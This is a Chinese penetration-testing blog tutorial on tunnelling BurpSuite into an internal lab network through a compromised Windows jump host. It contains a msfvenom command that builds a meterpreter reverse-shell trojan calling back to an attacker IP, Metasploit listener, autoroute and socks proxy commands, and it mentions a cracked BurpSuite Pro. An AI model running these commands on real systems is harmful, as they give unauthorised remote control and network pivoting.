Skip to main content

BurpSuite 扫内网_lainwith 的博客 - CSDN 博客

本文由 简悦 SimpRead 转码, 原文地址 blog.csdn.net

目录

纸上得来终觉浅,绝知此事要躬行。网上资料怎么写的都有,花了大半天时间整理了一下😔

burpsuite 设置 socks5 代理访问内网

测试环境如下:

注意事项:关闭跳板机 win2012 的防火墙,否则可能出现隧道无法正常使用。

  1. 跳板机配置隧道

ew_for_Win.exe -s ssocksd -l 1080

  1. 配置 BurpSuite

  1. 访问内网机器

burpsuite 设置上游代理访问内网

msf 拿下站点,如何转给 BurpSuite?
拓扑图如下:

  1. msfvenom 生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4455 -f exe >r.exe
然后 msf 开启监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.239.141
msf6 exploit(multi/handler) > set lport 4455
msf6 exploit(multi/handler) > exploit

  1. 跳板机 win2012 运行木马

  1. msf 获取 shell

  1. msf 起路由

可以参考之前的文章:https://www.yuque.com/u1881995/pborfs/nf2nn5#rAXIQ
4.1 查看网络接口信息:run get_local_subnets
4.2 以 CIDR 的方式添加路由信息:run autoroute -s 192.168.195.0/24
4.3 查看活动路由列表,确认路由情况:run autoroute -p

  1. 配置 socks_proxy

配置 socks_proxy,并运行

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

Name Description
---- -----------
Proxy Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > exploit

下图中可以看到,没有 socks4a 了,取而代之的是auxiliary/server/socks_proxy,但是在配置选项,可以看到其支持 5 和 4a 两种,这里就用默认的 5 就行,不需要做额外配置,直接运行。

  1. 配置 windwos

这个时候先缕一缕思路啊,跳板机直通内网,kali 通过添加路由能间接通向内网。现在是如何让 win7 与 kali 之间建立隧道联系。在第 5 步中,msf 开启 socks 连接,win7 只需要把流量发到 kali 的 1080 端口即可。

6.1 测试 win7 联通内网 web

我这里使用插件 SwitchyOmega 配置一个代理,指明协议(kali 使用 socks5)、kali 的地址和 kali 监听的端口

试着访问一下,发现完全 OK

此时让我们再来捋一下思路。

  1. win2012 直通内网靶机
  2. msf 直通 win2012,通过添加路由,间接通向内网靶机
  3. win7 直通 kali,通过访问 msf 的 socks5 连接,将流量发送到 kali
  4. 最终的体验效果,就像是 win7 可以通过浏览器访问内网 debian 的 web 服务

这里,就已经证明网络是通的了,下面就可以去设置 BurpSuite 了

6.2 设置 BurpSuite

这里有个问题,我要使用 BurpSuite,怎么玩呢?我们知道,win7 是通过 socks5 协议与 msf 建立连接的,那么,我可以让 win7 的浏览器走 BurpSuite,BurpSuite 再把流量转发给本地的 Socks 代理工具,再由代理工具把流量发给 msf 即可。如下图

  1. 以管理员身份启动 SocksCap64,它才可以导入本机安装的浏览器。首次启动画面如下

  1. 添加代理

完事后点击右侧的 “保存” 按钮即可。

  1. 测试网络是否通畅

  1. 开启全局代理

SocksCap64 监听本地的 25378 端口

  1. BurpSuite 设置顶级代理访问内网

上面内容是英文的,就啰嗦一下上面写的都是啥玩意吧。拿中文版的 BurpSuite 解释一下。
5.1 额外介绍的内容
以经典的 burpsuite_pron_v2.1.07 为例,安装 java,激活 BurpSuite 之后,点击 “创建桌面快捷方式. bat”,就会在桌面创建一个图标。

5.2 点击桌面的 BurpSuite 图标

  1. BurpSuite 可以使用了


可以正常使用重放模块